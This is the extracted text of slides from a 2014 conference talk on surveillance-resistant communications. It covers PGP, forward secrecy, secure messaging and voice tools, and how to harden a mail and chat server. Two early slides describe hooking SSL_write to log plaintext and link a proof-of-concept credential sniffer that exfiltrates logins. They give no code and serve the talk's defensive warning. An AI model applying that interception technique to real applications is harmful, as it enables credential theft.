  49. 49. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil Always keep in mind theAlways keep in mind the EvilEvil ServerServer User-land libraries may dump your SSLUser-land libraries may dump your SSL (…) attempts to(…) attempts to MITMMITM these communications at the network level havethese communications at the network level have been fruitless. To get at this sensitive data we will interceptbeen fruitless. To get at this sensitive data we will intercept calls tocalls to SSL_writeSSL_write, the function, the function responsible for encrypting thenresponsible for encrypting then sending data over a socketsending data over a socket. Intercepting SSL_write will allow us to. Intercepting SSL_write will allow us to log the string sent to the function and pass the originallog the string sent to the function and pass the original parameters along,parameters along, effectively bypassing the encryption protectionseffectively bypassing the encryption protections while allowing the application to run normallywhile allowing the application to run normally https://www.netspi.com/DesktopModules/SunBlog/Handlers/Print.aspx?id=191https://www.netspi.com/DesktopModules/SunBlog/Handlers/Print.aspx?id=191 False sense of securityFalse sense of security
  50. 50. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil Always keep in mind theAlways keep in mind the EvilEvil ServerServer Man-in-the-App Proof-of-ConceptMan-in-the-App Proof-of-Concept Credential SnifferCredential Sniffer https://github.com/jseidl/mitahttps://github.com/jseidl/mita (…) will(…) will detect and logdetect and log anyany credential communicationcredential communication overover cookies and get/post requestscookies and get/post requests and exfiltrate somewhere.and exfiltrate somewhere. (…) monitors data from inside(…) monitors data from inside application context/env. thusapplication context/env. thus can't be defeated by the usecan't be defeated by the use of SSLof SSL.. False sense of securityFalse sense of security
  51. 51. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil Truth is, email is ooooooldTruth is, email is oooooold E-mail never meant to be secureE-mail never meant to be secure First concept ~1962 (AUTODIN)First concept ~1962 (AUTODIN) From host-based, to LAN-based, to ARPANET-based, to INTERNET-basedFrom host-based, to LAN-based, to ARPANET-based, to INTERNET-based In IT, old pans doesn't makes good food.In IT, old pans doesn't makes good food.
  52. 52. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil Second, email is also plaintextSecond, email is also plaintext E-mail never meant to be secureE-mail never meant to be secure You're starting to hate this word, aren't you?You're starting to hate this word, aren't you?
  53. 53. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil –– But hey, I've heard of this PGP thingy...But hey, I've heard of this PGP thingy... E-mail never meant to be secureE-mail never meant to be secure –– It has that encryption thing you were talking about...It has that encryption thing you were talking about... Yeap! And can also be used to verify the identity of the sender!Yeap! And can also be used to verify the identity of the sender!
  54. 54. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil And there's also a GNU version!And there's also a GNU version! E-mail never meant to be secureE-mail never meant to be secure Isn't that beautiful?Isn't that beautiful?
  55. 55. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil Fact is: PGP is quite complicatedFact is: PGP is quite complicated E-mail never meant to be secureE-mail never meant to be secure Did I mentioned the lack of mail client support?Did I mentioned the lack of mail client support?
  56. 56. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil Fact is: PGP doesn't protects metadataFact is: PGP doesn't protects metadata E-mail never meant to be secureE-mail never meant to be secure Servers involvedServers involved People's names and e-mail addressesPeople's names and e-mail addresses Lots of other informationLots of other information
  57. 57. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil Fact is: E-mail can't be fixedFact is: E-mail can't be fixed E-mail never meant to be secureE-mail never meant to be secure (in my opinion)(in my opinion) Encryption breaks search.Encryption breaks search. Indexing hurts security.Indexing hurts security. Decrypt all your messages to search? Good luck with that.Decrypt all your messages to search? Good luck with that. If perfect-forward, messages will be lost over time.If perfect-forward, messages will be lost over time. Key handling would be nightmare.Key handling would be nightmare.
  58. 58. Secure communicationsSecure communications
  59. 59. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil As Jack the Ripper would say, let's go by partsAs Jack the Ripper would say, let's go by parts Secure communications (mostly)Secure communications (mostly)
  60. 60. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil Now that you know you can't trust the partiesNow that you know you can't trust the parties Secure communications (mostly)Secure communications (mostly) There's no way you want your data in plaintext over the circuitThere's no way you want your data in plaintext over the circuit The service machine may be evil and under 3rd party controlThe service machine may be evil and under 3rd party control Your own network may be compromisedYour own network may be compromised You definitely can't trust no ISPYou definitely can't trust no ISP You better not trust no one ;)You better not trust no one ;)
  61. 61. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil Make sure your workstation is secureMake sure your workstation is secure Secure communications (mostly)Secure communications (mostly) https://tails.boum.org/https://tails.boum.org/ Prefer live-cd operating systemsPrefer live-cd operating systems
  62. 62. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil Roll your own local DNS serverRoll your own local DNS server Secure communications (mostly)Secure communications (mostly) Configure-it properly!Configure-it properly! Completely block outside accessCompletely block outside access Listen on loopback onlyListen on loopback only Etc...Etc...
  63. 63. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil Embrace the darknessEmbrace the darkness Secure communications (mostly)Secure communications (mostly) Darknets are the new blackDarknets are the new black http://en.wikipedia.org/wiki/Darknet_(file_sharinghttp://en.wikipedia.org/wiki/Darknet_(file_sharing)) A darknet is a private network where connections are made only between trusted peers (…)A darknet is a private network where connections are made only between trusted peers (…) Darknets are distinct from other distributed peer-to-peer networks as sharing is anonymous (…)Darknets are distinct from other distributed peer-to-peer networks as sharing is anonymous (…) and therefore users can communicate with little fear of governmental or corporate interference.and therefore users can communicate with little fear of governmental or corporate interference.
  64. 64. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil Embrace the darknessEmbrace the darkness Secure communications (mostly)Secure communications (mostly) Popular darknetsPopular darknets https://www.torproject.org/https://www.torproject.org/ http://geti2p.net/en/http://geti2p.net/en/ https://freenetproject.org/https://freenetproject.org/
  65. 65. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil Perfect-forward secrecyPerfect-forward secrecy Secure communications (mostly)Secure communications (mostly) ““(...) Allows today information to be kept secret even if the private key is(...) Allows today information to be kept secret even if the private key is compromised in the future.”compromised in the future.” –– Vincent Bernat, PhDVincent Bernat, PhD
  66. 66. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil Perfect-forward secrecyPerfect-forward secrecy Secure communications (mostly)Secure communications (mostly) Without forward-secrecy (TLS-AES128-SHA)Without forward-secrecy (TLS-AES128-SHA) http://vincent.bernat.im/en/blog/2011-ssl-perfect-forward-secrecy.htmlhttp://vincent.bernat.im/en/blog/2011-ssl-perfect-forward-secrecy.html
  67. 67. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil Perfect-forward secrecyPerfect-forward secrecy Secure communications (mostly)Secure communications (mostly) With forward-secrecy (Ephemeral Diffie-Hellman)With forward-secrecy (Ephemeral Diffie-Hellman) http://vincent.bernat.im/en/blog/2011-ssl-perfect-forward-secrecy.htmlhttp://vincent.bernat.im/en/blog/2011-ssl-perfect-forward-secrecy.html ““Because the Diffie-Hellman exchange described above always uses newBecause the Diffie-Hellman exchange described above always uses new random values a and b, it is calledrandom values a and b, it is called EphemeralEphemeral Diffie-HellmanDiffie-Hellman (EDH or DHE).(EDH or DHE). Cipher suites like DHE-RSA-AES128-SHA use this protocol to achieve perfectCipher suites like DHE-RSA-AES128-SHA use this protocol to achieve perfect forward secrecy”forward secrecy” Optional Forward-secrecy:Optional Forward-secrecy: ECDHE-RSA-AES128-SHA:AES128-SHA:RC4-SHAECDHE-RSA-AES128-SHA:AES128-SHA:RC4-SHA Forward-secrecy only:Forward-secrecy only: ECDHE-RSA-AES128-SHA:DHE-RSA-AES128-SHA:EDH-DSS-DES-CBC3-SHAECDHE-RSA-AES128-SHA:DHE-RSA-AES128-SHA:EDH-DSS-DES-CBC3-SHA
  68. 68. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil Perfect-forward secrecyPerfect-forward secrecy Secure communications (mostly)Secure communications (mostly) With forward-secrecy (TextSecure's OTR ratchet)With forward-secrecy (TextSecure's OTR ratchet) https://whispersystems.org/blog/advanced-ratcheting/https://whispersystems.org/blog/advanced-ratcheting/
  69. 69. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil Perfect-forward secrecyPerfect-forward secrecy Secure communications (mostly)Secure communications (mostly) Apache & NGINXApache & NGINX http://bit.ly/1hmsysRhttp://bit.ly/1hmsysR ““Configuring Apache, Nginx, and OpenSSL for Forward Secrecy”Configuring Apache, Nginx, and OpenSSL for Forward Secrecy”
  70. 70. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil Perfect-forward secrecyPerfect-forward secrecy Secure communications (mostly)Secure communications (mostly) Gtalk, Hangouts, Facebook Chat andGtalk, Hangouts, Facebook Chat and any XMPP-based I.M.any XMPP-based I.M. https://securityinabox.org/en/pidgin_mainhttps://securityinabox.org/en/pidgin_main ““Pidgin with OTR - Secure Instant Messaging”Pidgin with OTR - Secure Instant Messaging” http://phrozenblog.com/?p=615http://phrozenblog.com/?p=615 ““Encrypt your GTalk / Hangout / Facebook chat”Encrypt your GTalk / Hangout / Facebook chat”
  71. 71. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil Perfect-forward secrecyPerfect-forward secrecy Secure communications (mostly)Secure communications (mostly) Mobile messagingMobile messaging https://play.google.com/store/apps/details?id=org.thoughtcrime.securesmshttps://play.google.com/store/apps/details?id=org.thoughtcrime.securesms TextSecure Private Messenger (Android only)TextSecure Private Messenger (Android only) https://telegram.org/https://telegram.org/ Telegram (Android & iOS)Telegram (Android & iOS)
  72. 72. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil Perfect-forward secrecyPerfect-forward secrecy Secure communications (mostly)Secure communications (mostly) Voice callsVoice calls http://en.wikipedia.org/wiki/ZRTPhttp://en.wikipedia.org/wiki/ZRTP VoIP with ZRTPVoIP with ZRTP
  73. 73. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil Perfect-forward secrecyPerfect-forward secrecy Secure communications (mostly)Secure communications (mostly) Mobile ZRTPMobile ZRTP https://play.google.com/store/apps/details?id=org.thoughtcrime.redphonehttps://play.google.com/store/apps/details?id=org.thoughtcrime.redphone RedPhone (Android only)RedPhone (Android only)
  74. 74. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil Perfect-forward secrecyPerfect-forward secrecy Secure communications (mostly)Secure communications (mostly) Platform S/ZRTPPlatform S/ZRTP https://jitsi.org/Main/HomePagehttps://jitsi.org/Main/HomePage
  75. 75. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil Perfect-forward secrecyPerfect-forward secrecy Secure communications (mostly)Secure communications (mostly) Platform S/ZRTPPlatform S/ZRTP http://bit.ly/1jvlbo7http://bit.ly/1jvlbo7 ““How To Encrypt Chat And VoIP With Jitsi and XMPP”How To Encrypt Chat And VoIP With Jitsi and XMPP”
  76. 76. Secure communication infrastructureSecure communication infrastructure
  77. 77. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil More load to process, more time to processMore load to process, more time to process Secure communication infrastructureSecure communication infrastructure Encryptions makes things slowerEncryptions makes things slower
  78. 78. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil First, choose your preferred Linux flavorFirst, choose your preferred Linux flavor Secure communication infrastructureSecure communication infrastructure or BSD if you want :)or BSD if you want :)
  79. 79. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil Let's start with some good full-disk encryptionLet's start with some good full-disk encryption Secure communication infrastructureSecure communication infrastructure Most distro's installer offer this option nowadaysMost distro's installer offer this option nowadays It's not hard to implement if you are already a sysadminIt's not hard to implement if you are already a sysadmin https://library.linode.com/security/full-disk-encryptionhttps://library.linode.com/security/full-disk-encryption
  80. 80. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil Then harden that system, baby!Then harden that system, baby! Secure communication infrastructureSecure communication infrastructure Fix your perms (least privilege principle)Fix your perms (least privilege principle) Setup your services config. properlySetup your services config. properly Uninstall bloatware + Apply security updatesUninstall bloatware + Apply security updates Use host-firewall (at least)Use host-firewall (at least) *Disable kernel module loading*Disable kernel module loading *Install PaX / GRSecurity patches*Install PaX / GRSecurity patches *Not for the faint of heart*Not for the faint of heart http://grsecurity.net/http://grsecurity.net/
  81. 81. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil SSL EVERYWHERESSL EVERYWHERE Secure communication infrastructureSecure communication infrastructure In every communication between services, SSL must be enforcedIn every communication between services, SSL must be enforced Do certificate pinningDo certificate pinning https://www.owasp.org/index.php/Certificate_and_Public_Key_Pinninghttps://www.owasp.org/index.php/Certificate_and_Public_Key_Pinning
  82. 82. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil LDAP for identity management &LDAP for identity management & authenticationauthentication Secure communication infrastructureSecure communication infrastructure Most software has support for LDAP as backendMost software has support for LDAP as backend
  83. 83. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil Pretty default mail stackPretty default mail stack Secure communication infrastructureSecure communication infrastructure Postfix + Dovecot + dspam + postgrey + LDAP auth. backendPostfix + Dovecot + dspam + postgrey + LDAP auth. backend
  84. 84. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil We add auto PGP encryption to itWe add auto PGP encryption to it Secure communication infrastructureSecure communication infrastructure –– Heyyyy, but you said PGP sucks!Heyyyy, but you said PGP sucks! –– I never said that! It's still better than plaintext!I never said that! It's still better than plaintext! https://github.com/mikecardwell/gpgithttps://github.com/mikecardwell/gpgit https://perot.me/encrypt-specific-incoming-emails-using-dovecot-and-sievehttps://perot.me/encrypt-specific-incoming-emails-using-dovecot-and-sieve
  85. 85. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil PGP supported softwarePGP supported software Secure communication infrastructureSecure communication infrastructure Thunderbird handles well with Enigmail pluginThunderbird handles well with Enigmail plugin K9 Mail (Android) only handles low quality PGP keys (due APG limitation)K9 Mail (Android) only handles low quality PGP keys (due APG limitation) Other mail clients may support PGP tooOther mail clients may support PGP too https://addons.mozilla.org/en-US/thunderbird/addon/enigmail/https://addons.mozilla.org/en-US/thunderbird/addon/enigmail/
  86. 86. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil XMPP for chatXMPP for chat Secure communication infrastructureSecure communication infrastructure Will use SSL for connection but clients need to do OTR on their sideWill use SSL for connection but clients need to do OTR on their side
  87. 87. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil XMPP for chatXMPP for chat Secure communication infrastructureSecure communication infrastructure ejabberd + punjab BOSH proxy +ejabberd + punjab BOSH proxy + LDAP auth. Backend + MySQL roster backendLDAP auth. Backend + MySQL roster backend https://github.com/twonds/punjabhttps://github.com/twonds/punjab http://www.ejabberd.im/http://www.ejabberd.im/
  88. 88. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil Compliant XMPP+OTR clientsCompliant XMPP+OTR clients Secure communication infrastructureSecure communication infrastructure Win/Mac OS X/Linux: PidginWin/Mac OS X/Linux: Pidgin Android: XabberAndroid: Xabber IOS / Android: ChatSecureIOS / Android: ChatSecure https://pidgin.im/https://pidgin.im/ http://www.xabber.org/http://www.xabber.org/ http://chrisballinger.info/apps/chatsecure/http://chrisballinger.info/apps/chatsecure/
  89. 89. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil XMPP+OTR clients + S/ZRTPXMPP+OTR clients + S/ZRTP Secure communication infrastructureSecure communication infrastructure https://jitsi.org/Main/HomePagehttps://jitsi.org/Main/HomePage
  90. 90. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil Optional insecure feature: Web-mail InterfaceOptional insecure feature: Web-mail Interface Secure communication infrastructureSecure communication infrastructure Browsers are vulnerable to many attacksBrowsers are vulnerable to many attacks Open-source web-mail software code still needs maturityOpen-source web-mail software code still needs maturity Crypto-in-the-browser is a little creepyCrypto-in-the-browser is a little creepy
  91. 91. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil Optional insecure feature: Web-mail InterfaceOptional insecure feature: Web-mail Interface Secure communication infrastructureSecure communication infrastructure Roundcube + rc_openpgpjs + LDAP auth. BackendRoundcube + rc_openpgpjs + LDAP auth. Backend converse.js for embedded chatconverse.js for embedded chat http://roundcube.net/http://roundcube.net/ https://github.com/qnrq/rc_openpgpjshttps://github.com/qnrq/rc_openpgpjs https://github.com/jcbrand/converse.js/https://github.com/jcbrand/converse.js/ https://github.com/priyadi/roundcube-converse.js-xmpp-pluginhttps://github.com/priyadi/roundcube-converse.js-xmpp-plugin
  92. 92. The final productThe final product Secure communication infrastructureSecure communication infrastructure
  93. 93. The remaining points of failureThe remaining points of failure
  94. 94. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil Metadata is gold and is always leaking outMetadata is gold and is always leaking out The remaining points of failureThe remaining points of failure Metadata is "data about data".Metadata is "data about data". http://en.wikipedia.org/wiki/Metadatahttp://en.wikipedia.org/wiki/Metadata
  95. 95. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil Metadata is gold and is always leaking outMetadata is gold and is always leaking out The remaining points of failureThe remaining points of failure Metadata carries out lots ofMetadata carries out lots of Personal Identifiable Information (PII)Personal Identifiable Information (PII) Can be very helpful on correlating people and eventsCan be very helpful on correlating people and events Leaks everywhere.Leaks everywhere. DNS, Web, Email, Documents, Images, Photos from cameras and cellphones etcDNS, Web, Email, Documents, Images, Photos from cameras and cellphones etc
  96. 96. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil Code may haveCode may have bugsbugs The remaining points of failureThe remaining points of failure Even the ones meant to secure us.Even the ones meant to secure us. Just likeJust like OpenSSL's HeartbleedOpenSSL's Heartbleed andand Apple's goto failApple's goto fail
  97. 97. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil Code may haveCode may have featuresfeatures The remaining points of failureThe remaining points of failure http://bit.ly/18DOX71http://bit.ly/18DOX71
  98. 98. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil Code may haveCode may have featuresfeatures The remaining points of failureThe remaining points of failure http://cnet.co/1rVzAL0http://cnet.co/1rVzAL0
  99. 99. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil Code may haveCode may have featuresfeatures The remaining points of failureThe remaining points of failure http://bit.ly/1hO99Uohttp://bit.ly/1hO99Uo
  100. 100. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil Agencies can be very persuasiveAgencies can be very persuasive The remaining points of failureThe remaining points of failure
  101. 101. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil –– So I'll never be completely safe?So I'll never be completely safe? Closing upClosing up
  102. 102. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil –– Well, so I don't need to do security at allWell, so I don't need to do security at all Closing upClosing up
  103. 103. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil Closing upClosing up We know security is not easyWe know security is not easy Security = UsabilitySecurity = Usability-1-1
  104. 104. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil Sometimes can be a painSometimes can be a pain Closing upClosing up
  105. 105. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil But you gotta take care out there!But you gotta take care out there! Closing upClosing up
  106. 106. That's all folks!That's all folks! http://wroot.orghttp://wroot.org @jseidl@jseidl jseidl@wroot.orgjseidl@wroot.orghttps://github.com/jseidl/https://github.com/jseidl/ http://www.slideshare.net/jseidlhttp://www.slideshare.net/jseidl
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×